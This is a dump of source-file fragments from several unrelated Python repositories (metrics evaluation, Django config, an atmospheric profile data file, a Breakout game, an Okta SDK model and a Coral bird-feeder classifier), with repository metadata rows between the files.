    # Each prediction row holds per-class scores; argmax -> predicted class.
    pred = [preddf.iloc[i].tolist() for i in preddf.index]
    pred_class = [np.argmax(v) for v in pred]
    pred_prob_one = [v[1] for v in pred]
    p, r, f, s = sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=testdf["label"])
    results = dict()
    # Index 1 = positive class; index 0 = negative class (its recall is
    # reported as specificity).
    results["f1 score"] = f[1]
    results["recall"] = r[1]
    results["precision"] = p[1]
    results["specificity"] = r[0]

# chemprot
# micro-average of 5 target classes
# see "Potent pairing: ensemble of long short-term memory networks and support vector machine for chemical-protein relation extraction (Mehryary, 2018)" for details
if args.task == "chemprot":
    pred = [preddf.iloc[i].tolist() for i in preddf.index]
    pred_class = [np.argmax(v) for v in pred]
    # Map the sorted label strings to integer ids so they line up with the
    # argmax indices of the prediction columns.
    str_to_int_mapper = dict()
    for i, v in enumerate(sorted(testdf["label"].unique())):
        str_to_int_mapper[v] = i
    test_answer = [str_to_int_mapper[v] for v in testdf["label"]]
    p, r, f, s = sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=test_answer, average="micro")
    results = dict()
    results["f1 score"] = f
    results["recall"] = r
    results["precision"] = p

if args.task == "N2C2":
    pred = [preddf.iloc[i].tolist() for i in preddf.index]
    pred_class = [np.argmax(v) for v in pred]
    str_to_int_mapper = dict()
    # Fixed label order. NOTE(review): assumes this matches the label
    # indexing used when the classifier was trained -- confirm.
    labels = ["Reason-Drug", "Route-Drug", "Strength-Drug", "Frequency-Drug", "Duration-Drug", "Form-Drug", "Dosage-Drug", "ADE-Drug"]
    for i, v in enumerate(labels):
        str_to_int_mapper[v] = i
    test_answer = [str_to_int_mapper[v] for v in testdf["label"]]
    # print(sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=test_answer, labels=[0, 1, 2, 3, 4, 5, 6, 7, 8], average="none"))
    # Per-label scores first, printed one block per relation type ...
    for i, label in enumerate(labels):
        print(label + " result")
        p, r, f, s = sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=test_answer, labels=[i], average="macro")
        results = dict()
        results["f1 score"] = f
        results["recall"] = r
        results["precision"] = p
        for k, v in results.items():
            print("{:11s} : {:.2%}".format(k, v))
        print('\n')
    # ... then micro-averaged totals across all labels (printed by the
    # shared loop below).
    print('total' + " result\n")
    p, r, f, s = sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=test_answer, average="micro")
    results = dict()
    results["f1 score"] = f
    results["recall"] = r
    results["precision"] = p

# Print the metrics for whichever task branch populated `results`.
for k, v in results.items():
    print("{:11s} : {:.2%}".format(k, v))
| 41.445946 | 164 | 0.661559 |
0cf776032667c66aa9047465a936c18e4c0e130b | 99 | py | Python | mysite/ChainLicense/apps.py | Hwieun/ChainLicense | 35d552ff1cfd056584a54b946999ff287e87d8ad | [
"Apache-2.0"
] | 2 | 2019-09-23T01:55:46.000Z | 2019-11-08T16:33:47.000Z | mysite/ChainLicense/apps.py | Hwieun/ChainLicense | 35d552ff1cfd056584a54b946999ff287e87d8ad | [
"Apache-2.0"
] | 1 | 2019-10-07T01:11:55.000Z | 2019-10-07T01:11:55.000Z | mysite/ChainLicense/apps.py | Hwieun/ChainLicense | 35d552ff1cfd056584a54b946999ff287e87d8ad | [
"Apache-2.0"
] | 1 | 2019-09-24T06:22:30.000Z | 2019-09-24T06:22:30.000Z | from django.apps import AppConfig
| 16.5 | 36 | 0.777778 |
0cf9f78c1ecb148ea8cc9e86512596f09bae6846 | 1,403 | py | Python | tests/test_find_deployment.py | Suremaker/consul-deployment-agent | 466c36d3fcb9f8bfa144299dde7cb94f4341907b | [
"Apache-2.0"
] | 6 | 2016-10-10T09:26:07.000Z | 2018-09-20T08:59:42.000Z | tests/test_find_deployment.py | Suremaker/consul-deployment-agent | 466c36d3fcb9f8bfa144299dde7cb94f4341907b | [
"Apache-2.0"
] | 11 | 2016-10-10T12:11:07.000Z | 2018-05-09T22:11:02.000Z | tests/test_find_deployment.py | Suremaker/consul-deployment-agent | 466c36d3fcb9f8bfa144299dde7cb94f4341907b | [
"Apache-2.0"
] | 16 | 2016-09-28T16:00:58.000Z | 2019-02-25T16:52:12.000Z | # Copyright (c) Trainline Limited, 2016-2017. All rights reserved. See LICENSE.txt in the project root for license information.
from os.path import join
import unittest
from mock import patch
from agent.find_deployment import find_deployment_dir_win | 48.37931 | 127 | 0.726301 |
0cfa89782c8d3290c0c6ceba7319a0449a110fed | 2,585 | py | Python | model/embeddings.py | johnnytorres/crisis_conv_crosslingual | a30e762007e08190275bdd83af3c0bbc717fb516 | [
"MIT"
] | null | null | null | model/embeddings.py | johnnytorres/crisis_conv_crosslingual | a30e762007e08190275bdd83af3c0bbc717fb516 | [
"MIT"
] | null | null | null | model/embeddings.py | johnnytorres/crisis_conv_crosslingual | a30e762007e08190275bdd83af3c0bbc717fb516 | [
"MIT"
] | 1 | 2019-12-03T00:29:14.000Z | 2019-12-03T00:29:14.000Z | import os
import logging
import argparse
import numpy as np
import tensorflow as tf
from keras_preprocessing.text import Tokenizer
from tqdm import tqdm
from data import DataLoader
if __name__ == '__main__':
    # Timestamped DEBUG logging for the whole run.
    logging.basicConfig(format='%(asctime)s %(message)s', level=logging.DEBUG)
    logging.info('initializing task...')
    parser = argparse.ArgumentParser()
    parser.add_argument('--data-dir', default='data/claff-happydb')
    parser.add_argument('--embeddings-path', type=str, default=None)
    parser.add_argument('--num-unlabeled', type=int, default=1000)
    parser.add_argument('--use-allfeats', action='store_true', default=False)
    # NOTE(review): with action='store_true' AND default=True, --predict is
    # always True and the flag cannot disable it -- confirm this is intended.
    parser.add_argument('--predict', action='store_true', default=True)
    builder = EmbeddingsBuilder(args=parser.parse_args())
    builder.run()
    logging.info('task finished...[ok]')
| 31.91358 | 109 | 0.635977 |
0cfa9b70f4dd085778dfa0f986d2747b6f89ea72 | 430 | py | Python | bin/ADFRsuite/CCSBpckgs/mglkey/__init__.py | AngelRuizMoreno/Jupyter_Dock_devel | 6d23bc174d5294d1e9909a0a1f9da0713042339e | [
"MIT"
] | null | null | null | bin/ADFRsuite/CCSBpckgs/mglkey/__init__.py | AngelRuizMoreno/Jupyter_Dock_devel | 6d23bc174d5294d1e9909a0a1f9da0713042339e | [
"MIT"
] | null | null | null | bin/ADFRsuite/CCSBpckgs/mglkey/__init__.py | AngelRuizMoreno/Jupyter_Dock_devel | 6d23bc174d5294d1e9909a0a1f9da0713042339e | [
"MIT"
] | 1 | 2021-11-04T21:48:14.000Z | 2021-11-04T21:48:14.000Z | #############################################################################
#
# Author: Michel F. SANNER
#
# Copyright: M. Sanner and TSRI 2015
#
#########################################################################
#
# $Header: /mnt/raid/services/cvs/mglkeyDIST/mglkey/__init__.py,v 1.1.1.1 2016/12/07 23:27:34 sanner Exp $
#
# $Id: __init__.py,v 1.1.1.1 2016/12/07 23:27:34 sanner Exp $
#
from mglkey import MGL_check_key
| 30.714286 | 106 | 0.448837 |
0cfc5802ff58618fd079fd5185d9edd8be7eda97 | 13,342 | py | Python | source/rttov_test/profile-datasets-py/div83/027.py | bucricket/projectMAScorrection | 89489026c8e247ec7c364e537798e766331fe569 | [
"BSD-3-Clause"
] | null | null | null | source/rttov_test/profile-datasets-py/div83/027.py | bucricket/projectMAScorrection | 89489026c8e247ec7c364e537798e766331fe569 | [
"BSD-3-Clause"
] | 1 | 2022-03-12T12:19:59.000Z | 2022-03-12T12:19:59.000Z | source/rttov_test/profile-datasets-py/div83/027.py | bucricket/projectMAScorrection | 89489026c8e247ec7c364e537798e766331fe569 | [
"BSD-3-Clause"
] | null | null | null | """
Profile ../profile-datasets-py/div83/027.py
file automaticaly created by prof_gen.py script
"""
self["ID"] = "../profile-datasets-py/div83/027.py"
self["Q"] = numpy.array([ 1.51831800e+00, 2.02599600e+00, 2.94787100e+00,
3.99669400e+00, 4.71653800e+00, 4.89106600e+00,
5.14399400e+00, 5.67274800e+00, 6.02338400e+00,
6.09836300e+00, 6.08376300e+00, 6.01126400e+00,
5.91866500e+00, 5.77584700e+00, 5.59481900e+00,
5.41637100e+00, 5.26750200e+00, 5.10689400e+00,
4.98576500e+00, 4.90039600e+00, 4.80689700e+00,
4.63989800e+00, 4.46443000e+00, 4.30135100e+00,
4.16606300e+00, 4.06766300e+00, 4.01361400e+00,
3.95640400e+00, 3.87825500e+00, 3.79394600e+00,
3.73623600e+00, 3.72919600e+00, 3.74067600e+00,
3.78187600e+00, 3.81900500e+00, 3.85233500e+00,
3.88512500e+00, 3.91148500e+00, 3.92466500e+00,
3.92849500e+00, 3.93905400e+00, 3.97355400e+00,
4.02951400e+00, 4.05710400e+00, 4.04558400e+00,
4.02228400e+00, 4.01040400e+00, 4.00572400e+00,
4.00641400e+00, 4.08608300e+00, 4.44130000e+00,
5.00126500e+00, 5.73600700e+00, 6.83860300e+00,
8.34002000e+00, 9.95999100e+00, 1.13537700e+01,
1.24435500e+01, 1.36048100e+01, 1.55239600e+01,
1.77784800e+01, 1.93991200e+01, 2.00516000e+01,
1.97941100e+01, 1.89638400e+01, 1.84148600e+01,
1.82331700e+01, 1.84861600e+01, 2.02668900e+01,
3.24805400e+01, 6.31028200e+01, 1.09865900e+02,
1.71694500e+02, 2.41407700e+02, 3.05073900e+02,
3.60772800e+02, 4.04902000e+02, 4.16543400e+02,
4.04623200e+02, 3.59892400e+02, 3.06567000e+02,
3.03443900e+02, 4.25764600e+02, 8.75110500e+02,
1.60701300e+03, 2.52645100e+03, 3.50894400e+03,
4.39830900e+03, 5.05090900e+03, 5.40195000e+03,
5.54486300e+03, 5.86218200e+03, 6.10752900e+03,
6.83105600e+03, 6.63557500e+03, 6.44820100e+03,
6.26853800e+03, 6.09616900e+03, 5.93072700e+03,
5.77187200e+03, 5.61926500e+03])
self["P"] = numpy.array([ 5.00000000e-03, 1.61000000e-02, 3.84000000e-02,
7.69000000e-02, 1.37000000e-01, 2.24400000e-01,
3.45400000e-01, 5.06400000e-01, 7.14000000e-01,
9.75300000e-01, 1.29720000e+00, 1.68720000e+00,
2.15260000e+00, 2.70090000e+00, 3.33980000e+00,
4.07700000e+00, 4.92040000e+00, 5.87760000e+00,
6.95670000e+00, 8.16550000e+00, 9.51190000e+00,
1.10038000e+01, 1.26492000e+01, 1.44559000e+01,
1.64318000e+01, 1.85847000e+01, 2.09224000e+01,
2.34526000e+01, 2.61829000e+01, 2.91210000e+01,
3.22744000e+01, 3.56505000e+01, 3.92566000e+01,
4.31001000e+01, 4.71882000e+01, 5.15278000e+01,
5.61260000e+01, 6.09895000e+01, 6.61253000e+01,
7.15398000e+01, 7.72396000e+01, 8.32310000e+01,
8.95204000e+01, 9.61138000e+01, 1.03017000e+02,
1.10237000e+02, 1.17778000e+02, 1.25646000e+02,
1.33846000e+02, 1.42385000e+02, 1.51266000e+02,
1.60496000e+02, 1.70078000e+02, 1.80018000e+02,
1.90320000e+02, 2.00989000e+02, 2.12028000e+02,
2.23442000e+02, 2.35234000e+02, 2.47408000e+02,
2.59969000e+02, 2.72919000e+02, 2.86262000e+02,
3.00000000e+02, 3.14137000e+02, 3.28675000e+02,
3.43618000e+02, 3.58966000e+02, 3.74724000e+02,
3.90893000e+02, 4.07474000e+02, 4.24470000e+02,
4.41882000e+02, 4.59712000e+02, 4.77961000e+02,
4.96630000e+02, 5.15720000e+02, 5.35232000e+02,
5.55167000e+02, 5.75525000e+02, 5.96306000e+02,
6.17511000e+02, 6.39140000e+02, 6.61192000e+02,
6.83667000e+02, 7.06565000e+02, 7.29886000e+02,
7.53628000e+02, 7.77790000e+02, 8.02371000e+02,
8.27371000e+02, 8.52788000e+02, 8.78620000e+02,
9.04866000e+02, 9.31524000e+02, 9.58591000e+02,
9.86067000e+02, 1.01395000e+03, 1.04223000e+03,
1.07092000e+03, 1.10000000e+03])
self["CO2"] = numpy.array([ 375.9234, 375.9232, 375.9219, 375.9195, 375.9172, 375.9142,
375.9041, 375.8819, 375.8607, 375.8617, 375.8997, 375.9717,
376.0398, 376.0858, 376.1489, 376.212 , 376.224 , 376.2321,
376.2481, 376.2772, 376.3252, 376.3663, 376.4023, 376.4224,
376.4504, 376.4865, 376.5545, 376.6335, 376.7605, 376.8966,
377.0446, 377.2036, 377.3766, 377.5606, 377.7106, 377.8485,
378.0765, 378.4945, 378.9365, 379.6475, 380.4225, 381.0245,
381.4085, 381.8025, 381.8315, 381.8625, 381.8985, 381.9405,
381.9845, 382.0364, 382.0903, 382.5651, 383.1618, 383.8894,
384.7668, 385.5962, 386.1156, 386.6532, 386.7607, 386.854 ,
386.8701, 386.8645, 386.8732, 386.8913, 386.9157, 386.9449,
386.9669, 386.9788, 386.9602, 386.9034, 386.8186, 386.7075,
386.6086, 386.5187, 386.4681, 386.4315, 386.4595, 386.5189,
386.6375, 386.8447, 387.1073, 387.3124, 387.433 , 387.3937,
387.2297, 386.9659, 386.6525, 386.3522, 386.1188, 385.9826,
385.9361, 385.8209, 385.7317, 385.4548, 385.5337, 385.6074,
385.6771, 385.744 , 385.8082, 385.8699, 385.9291])
self["CO"] = numpy.array([ 0.2205447 , 0.2185316 , 0.2145434 , 0.2078282 , 0.1977631 ,
0.1839901 , 0.1511932 , 0.09891954, 0.0827345 , 0.05454007,
0.02926452, 0.01534331, 0.01021024, 0.00922827, 0.00895567,
0.00841368, 0.00791632, 0.0076217 , 0.00749041, 0.00745301,
0.00740799, 0.00741502, 0.00746624, 0.00760092, 0.00775626,
0.00793258, 0.0081303 , 0.00834271, 0.00844155, 0.00854593,
0.00861921, 0.00869836, 0.00895125, 0.009236 , 0.00956421,
0.00993273, 0.01050776, 0.01155325, 0.01277055, 0.01483604,
0.01745463, 0.02009092, 0.02248201, 0.0252159 , 0.0250677 ,
0.0249136 , 0.0248554 , 0.0248671 , 0.0248747 , 0.0248604 ,
0.02484549, 0.02830606, 0.03349511, 0.03954063, 0.04649641,
0.05393566, 0.05777834, 0.06203953, 0.06291754, 0.06367061,
0.06376177, 0.06365417, 0.06355173, 0.06345124, 0.063449 ,
0.06353453, 0.06376724, 0.06416551, 0.06445159, 0.0646028 ,
0.06451203, 0.06417925, 0.06369376, 0.06310236, 0.06261609,
0.06216137, 0.06196 , 0.06180874, 0.06178709, 0.06208905,
0.06263239, 0.06350083, 0.06423774, 0.06476787, 0.06481747,
0.06471838, 0.06458966, 0.06447546, 0.06438733, 0.06432344,
0.06428367, 0.06423741, 0.0641983 , 0.06589368, 0.07015209,
0.07475692, 0.0797395 , 0.08513432, 0.09097941, 0.09731644,
0.1041912 ])
self["T"] = numpy.array([ 189.265, 197.336, 211.688, 227.871, 242.446, 252.765,
259.432, 262.908, 263.411, 262.202, 261.422, 259.368,
255.095, 250.075, 244.792, 239.205, 235.817, 231.46 ,
227.966, 225.935, 225.115, 222.382, 219.723, 218.152,
217.875, 218.211, 218.288, 218.294, 217.949, 217.202,
216.158, 214.964, 215.259, 215.053, 215.409, 216.081,
216.441, 216.152, 215.427, 215.082, 216.198, 217.247,
217.006, 216.373, 216.342, 217.088, 218.419, 219.839,
220.797, 220.946, 221.423, 222.504, 223.822, 225.134,
226.221, 226.93 , 227.275, 227.405, 227.434, 227.346,
227.212, 227.246, 227.566, 228.2 , 229.083, 230.094,
231.117, 232.121, 233.086, 234.01 , 235.064, 236.351,
237.928, 239.892, 242.039, 244.306, 246.651, 249.025,
251.415, 253.802, 256.16 , 258.448, 260.591, 262.445,
264.071, 265.349, 266.233, 266.969, 267.78 , 268.72 ,
269.42 , 270.502, 271.421, 273.317, 273.317, 273.317,
273.317, 273.317, 273.317, 273.317, 273.317])
self["N2O"] = numpy.array([ 0.00161 , 0.00187 , 0.00205999, 0.00220999, 0.00233999,
0.00235999, 0.00157999, 0.00186999, 0.00519997, 0.00870995,
0.00838995, 0.00955994, 0.01208993, 0.01432992, 0.0171399 ,
0.02172988, 0.02788985, 0.03756981, 0.04630977, 0.05168975,
0.05680973, 0.05922973, 0.06028973, 0.06131974, 0.07010971,
0.07957968, 0.08867964, 0.09929961, 0.1101496 , 0.1206295 ,
0.1301795 , 0.1371795 , 0.1439595 , 0.1505294 , 0.1651494 ,
0.1848693 , 0.2034792 , 0.2285391 , 0.252299 , 0.2748389 ,
0.2840589 , 0.2926288 , 0.3004188 , 0.3072488 , 0.3129187 ,
0.3172487 , 0.3200187 , 0.3209987 , 0.3209987 , 0.3209987 ,
0.3209986 , 0.3209984 , 0.3209982 , 0.3209978 , 0.3209973 ,
0.3209968 , 0.3209964 , 0.320996 , 0.3209956 , 0.320995 ,
0.3209943 , 0.3209938 , 0.3209936 , 0.3209936 , 0.3209939 ,
0.3209941 , 0.3209941 , 0.3209941 , 0.3209935 , 0.3209896 ,
0.3209797 , 0.3209647 , 0.3209449 , 0.3209225 , 0.3209021 ,
0.3208842 , 0.32087 , 0.3208663 , 0.3208701 , 0.3208845 ,
0.3209016 , 0.3209026 , 0.3208633 , 0.3207191 , 0.3204841 ,
0.320189 , 0.3198736 , 0.3195881 , 0.3193787 , 0.319266 ,
0.3192201 , 0.3191182 , 0.3190395 , 0.3188072 , 0.31887 ,
0.3189301 , 0.3189878 , 0.3190431 , 0.3190962 , 0.3191472 ,
0.3191962 ])
self["O3"] = numpy.array([ 0.1903137 , 0.2192386 , 0.3077081 , 0.5440408 , 0.8590299 ,
1.170854 , 1.499102 , 1.864289 , 2.273556 , 2.805293 ,
3.409769 , 4.028786 , 4.806182 , 5.619898 , 6.411164 ,
7.147361 , 7.51202 , 7.648961 , 7.644362 , 7.556123 ,
7.446574 , 7.281136 , 6.952659 , 6.604492 , 6.296854 ,
6.008776 , 5.751387 , 5.520268 , 5.311749 , 5.111921 ,
4.890092 , 4.593293 , 4.298724 , 3.882905 , 3.380027 ,
2.799559 , 2.288161 , 2.031152 , 2.018272 , 2.047542 ,
1.969722 , 1.685453 , 1.220825 , 0.9176053 , 0.8929574 ,
0.9542592 , 1.004996 , 1.034796 , 1.031726 , 1.019046 ,
0.8797071 , 0.6484178 , 0.4105526 , 0.2529783 , 0.1943934 ,
0.201197 , 0.2459162 , 0.322179 , 0.3977806 , 0.4292413 ,
0.4255834 , 0.3930204 , 0.3461121 , 0.2989281 , 0.2606191 ,
0.2321107 , 0.2069452 , 0.1838146 , 0.1618567 , 0.1410414 ,
0.1225313 , 0.1061913 , 0.09214328, 0.08133816, 0.07293074,
0.06636085, 0.06143102, 0.05859298, 0.05740586, 0.05732126,
0.05783027, 0.05809797, 0.05651443, 0.05019414, 0.0404447 ,
0.03280082, 0.02944741, 0.02902179, 0.02945348, 0.02918976,
0.02836743, 0.02750451, 0.02608958, 0.02225294, 0.02225732,
0.02226152, 0.02226555, 0.02226941, 0.02227312, 0.02227668,
0.02228009])
self["CH4"] = numpy.array([ 0.1059488, 0.1201298, 0.1306706, 0.1417254, 0.1691352,
0.209023 , 0.2345078, 0.2578465, 0.2845033, 0.328699 ,
0.3987896, 0.4800421, 0.5668716, 0.6510682, 0.7280449,
0.7954147, 0.8518465, 0.8903115, 0.9281374, 0.9731752,
1.016085 , 1.071595 , 1.131985 , 1.189835 , 1.247015 ,
1.302185 , 1.355285 , 1.400504 , 1.442154 , 1.464494 ,
1.488464 , 1.514124 , 1.541544 , 1.560774 , 1.579304 ,
1.596804 , 1.612894 , 1.627174 , 1.638294 , 1.650024 ,
1.662373 , 1.675353 , 1.688973 , 1.722213 , 1.729283 ,
1.736683 , 1.741733 , 1.745103 , 1.749093 , 1.755483 ,
1.762122 , 1.770021 , 1.77847 , 1.785498 , 1.790785 ,
1.795642 , 1.79793 , 1.800308 , 1.800506 , 1.800632 ,
1.800498 , 1.800295 , 1.800414 , 1.800704 , 1.800856 ,
1.800867 , 1.800517 , 1.799787 , 1.798434 , 1.796372 ,
1.794017 , 1.791393 , 1.789133 , 1.787118 , 1.785875 ,
1.784886 , 1.784827 , 1.785476 , 1.788046 , 1.791395 ,
1.795229 , 1.798224 , 1.800263 , 1.801052 , 1.800931 ,
1.80036 , 1.799234 , 1.797877 , 1.796739 , 1.796035 ,
1.795827 , 1.795294 , 1.79488 , 1.793604 , 1.793966 ,
1.794315 , 1.794639 , 1.794951 , 1.795249 , 1.795536 ,
1.795812 ])
# --- Scalar fields of this auto-generated RTTOV test profile ---
# NOTE(review): interpretations below are presumed from RTTOV naming
# conventions ("S2M" = 2 m surface variables, "SKIN" = surface skin);
# confirm against the consuming profile reader before relying on them.
self["CTP"] = 500.0          # presumably cloud-top pressure -- TODO confirm units
self["CFRACTION"] = 0.0      # cloud fraction (clear sky here)
self["IDG"] = 0
self["ISH"] = 0
self["ELEVATION"] = 0.0
# Near-surface ("2 m") state: temperature, humidity, ozone, pressure, wind.
self["S2M"]["T"] = 273.317
self["S2M"]["Q"] = 5619.26541873
self["S2M"]["O"] = 0.022280094739
self["S2M"]["P"] = 905.85559
self["S2M"]["U"] = 0.0
self["S2M"]["V"] = 0.0
self["S2M"]["WFETC"] = 100000.0
# Surface skin description (type, temperature, sea-surface parameters).
self["SKIN"]["SURFTYPE"] = 0
self["SKIN"]["WATERTYPE"] = 1
self["SKIN"]["T"] = 273.317
self["SKIN"]["SALINITY"] = 35.0
self["SKIN"]["FOAM_FRACTION"] = 0.0
self["SKIN"]["FASTEM"] = numpy.array([ 3. , 5. , 15. , 0.1, 0.3])
# Viewing / solar geometry (degrees) and location.
self["ZENANGLE"] = 0.0
self["AZANGLE"] = 0.0
self["SUNZENANGLE"] = 0.0
self["SUNAZANGLE"] = 0.0
self["LATITUDE"] = 45.309
self["GAS_UNITS"] = 2
# BE / COSBK: presumably magnetic-field parameters (Zeeman) -- TODO confirm.
self["BE"] = 0.0
self["COSBK"] = 0.0
# Acquisition date/time of the profile.
self["DATE"] = numpy.array([2007, 4, 1])
self["TIME"] = numpy.array([0, 0, 0])
| 57.508621 | 92 | 0.570979 |
0cfdd69003365202954e59ba474c596cdd274c91 | 10,386 | py | Python | stanCode_Projects/break_out_game/breakoutgraphics.py | kunyi1022/sc-projects | 0ab0019b2cdc86c434a0acff39b862263dcbc970 | [
"MIT"
] | null | null | null | stanCode_Projects/break_out_game/breakoutgraphics.py | kunyi1022/sc-projects | 0ab0019b2cdc86c434a0acff39b862263dcbc970 | [
"MIT"
] | null | null | null | stanCode_Projects/break_out_game/breakoutgraphics.py | kunyi1022/sc-projects | 0ab0019b2cdc86c434a0acff39b862263dcbc970 | [
"MIT"
] | null | null | null | """
stanCode Breakout Project
Adapted from Eric Roberts's Breakout by
Sonja Johnson-Yu, Kylie Jue, Nick Bowman,
and Jerry Liao
File: breakoutgraphics.py
Name: Jordan
-------------------------
This python file will create a class named BreakoutGraphics for the break out game.
This class will contain the building block for creating that game.
"""
from campy.graphics.gwindow import GWindow
from campy.graphics.gobjects import GOval, GRect, GLabel
from campy.gui.events.mouse import onmouseclicked, onmousemoved
import random
# Geometry and physics constants for the breakout game (sizes in pixels).
BRICK_SPACING = 5      # Space between bricks (in pixels). This space is used for horizontal and vertical spacing.
BRICK_WIDTH = 40       # Width of a brick (in pixels).
BRICK_HEIGHT = 15      # Height of a brick (in pixels).
BRICK_ROWS = 10        # Number of rows of bricks.
BRICK_COLS = 10        # Number of columns of bricks.
BRICK_OFFSET = 50      # Vertical offset of the topmost brick from the window top (in pixels).
BALL_RADIUS = 10       # Radius of the ball (in pixels).
PADDLE_WIDTH = 75      # Width of the paddle (in pixels).
PADDLE_HEIGHT = 15     # Height of the paddle (in pixels).
PADDLE_OFFSET = 50     # Vertical offset of the paddle from the window bottom (in pixels).
INITIAL_Y_SPEED = 7    # Initial vertical speed for the ball.
MAX_X_SPEED = 5        # Maximum initial horizontal speed for the ball.
| 39.192453 | 134 | 0.604756 |
0cfe0c2510332685f3cc3783752192ba32a124ab | 329 | py | Python | PythonExercicios/ex020.py | github-felipe/ExerciciosEmPython-cursoemvideo | 0045464a287f21b6245554a975588cf06c5b476d | [
"MIT"
] | null | null | null | PythonExercicios/ex020.py | github-felipe/ExerciciosEmPython-cursoemvideo | 0045464a287f21b6245554a975588cf06c5b476d | [
"MIT"
] | null | null | null | PythonExercicios/ex020.py | github-felipe/ExerciciosEmPython-cursoemvideo | 0045464a287f21b6245554a975588cf06c5b476d | [
"MIT"
] | null | null | null | from random import shuffle
# Read the names of four students.  input() already returns a str, so the
# redundant str() wrappers from the original were dropped.
a1 = input('Digite o nome de um aluno: ')
a2 = input('Digite o nome de outro aluno: ')
a3 = input('Digite o nome de mais outro aluno: ')
# Restored the mis-encoded accent in the prompt text ('último').
a4 = input('Digite o nome do último aluno: ')
lista = [a1, a2, a3, a4]
# Randomize the presentation order in place.
shuffle(lista)
# \033[34m ... \033[m renders the list in blue; the garbled accents in the
# original message ('apresentao :') were restored to 'apresentação é:'.
print(f'A ordem de apresentação é: \033[34m{lista}\033[m')
| 36.555556 | 58 | 0.680851 |
4901c51c1ea8530e44c195ecd1215f420a39da2d | 3,940 | py | Python | okta/models/profile_enrollment_policy_rule_action.py | ander501/okta-sdk-python | 0927dc6a2f6d5ebf7cd1ea806d81065094c92471 | [
"Apache-2.0"
] | null | null | null | okta/models/profile_enrollment_policy_rule_action.py | ander501/okta-sdk-python | 0927dc6a2f6d5ebf7cd1ea806d81065094c92471 | [
"Apache-2.0"
] | null | null | null | okta/models/profile_enrollment_policy_rule_action.py | ander501/okta-sdk-python | 0927dc6a2f6d5ebf7cd1ea806d81065094c92471 | [
"Apache-2.0"
] | null | null | null | # flake8: noqa
"""
Copyright 2021 - Present Okta, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# AUTO-GENERATED! DO NOT EDIT FILE DIRECTLY
# SEE CONTRIBUTOR DOCUMENTATION
from okta.okta_object import OktaObject
from okta.okta_collection import OktaCollection
from okta.models import profile_enrollment_policy_rule_activation_requirement\
as profile_enrollment_policy_rule_activation_requirement
from okta.models import pre_registration_inline_hook\
as pre_registration_inline_hook
from okta.models import profile_enrollment_policy_rule_profile_attribute\
as profile_enrollment_policy_rule_profile_attribute
| 42.826087 | 154 | 0.679949 |
490301996f235103083f9f733d639e25da1a8a52 | 1,478 | py | Python | test/test_compression.py | Peter42/iasi | fc799d542c2bb80c3f559bc2f9e833ac330a5506 | [
"MIT"
] | null | null | null | test/test_compression.py | Peter42/iasi | fc799d542c2bb80c3f559bc2f9e833ac330a5506 | [
"MIT"
] | 3 | 2019-05-02T12:49:21.000Z | 2019-06-12T09:11:00.000Z | test/test_compression.py | Peter42/iasi | fc799d542c2bb80c3f559bc2f9e833ac330a5506 | [
"MIT"
] | 1 | 2019-10-18T21:33:33.000Z | 2019-10-18T21:33:33.000Z | import datetime
import unittest
import luigi
import numpy as np
from netCDF4 import Dataset
from iasi.compression import (CompressDataset, CompressDateRange,
DecompressDataset)
| 30.791667 | 95 | 0.614344 |
4905009d57cff19e66575a7bfdba66a5dbebafe6 | 6,310 | py | Python | bird_classify.py | google-coral/project-birdfeeder | 3bcb9bfd4123a0c6f16a09087a8ccdfe0c6dd80e | [
"Apache-2.0"
] | 26 | 2019-07-23T22:32:08.000Z | 2022-01-09T15:15:50.000Z | bird_classify.py | hjonnala/project-birdfeeder | 4375a9370d7567b756b6cc68f4dfcb4c8183b118 | [
"Apache-2.0"
] | 13 | 2019-07-26T17:10:48.000Z | 2022-03-01T04:11:48.000Z | bird_classify.py | hjonnala/project-birdfeeder | 4375a9370d7567b756b6cc68f4dfcb4c8183b118 | [
"Apache-2.0"
] | 19 | 2019-11-05T03:01:31.000Z | 2022-03-29T01:13:46.000Z | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/python3
"""
Coral Smart Bird Feeder
Uses ClassificationEngine from the EdgeTPU API to analyze animals in
camera frames. Sounds a deterrent if a squirrel is detected.
Users define model, labels file, storage path, deterrent sound, and
optionally can set this to training mode for collecting images for a custom
model.
"""
import argparse
import time
import logging
from PIL import Image
from playsound import playsound
from pycoral.utils.dataset import read_label_file
from pycoral.utils.edgetpu import make_interpreter
from pycoral.adapters import common
from pycoral.adapters.classify import get_classes
import gstreamer
def save_data(image, results, path, ext='png'):
    """Write *image* into the storage directory and log the inference results.

    The file name embeds a zero-padded millisecond monotonic timestamp so
    successive frames sort chronologically; *results* is recorded in the log
    next to the same tag.
    """
    frame_tag = '%010d' % int(time.monotonic() * 1000)
    out_name = '%s/img-%s.%s' % (path, frame_tag, ext)
    image.save(out_name)
    print('Frame saved as: %s' % out_name)
    logging.info('Image: %s Results: %s', frame_tag, results)
def print_results(start_time, last_time, end_time, results):
    """Report inference latency, frame rate and per-label scores on stdout."""
    elapsed_ms = (end_time - start_time) * 1000
    frames_per_sec = 1.0 / (end_time - last_time)
    print('\nInference: %.2f ms, FPS: %.2f fps' % (elapsed_ms, frames_per_sec))
    for entry in results:
        # entry is a (label, score) pair; tuple formatting fills both slots.
        print(' %s, score=%.2f' % entry)
def do_training(results, last_results, top_k):
    """Return True when the newest predictions differ from the previous ones.

    Only label names are compared: if fewer than *top_k* labels are shared
    between the two result lists, the frame is considered "different" and is
    worth keeping as training data for a custom model.
    """
    current = {entry[0] for entry in results}
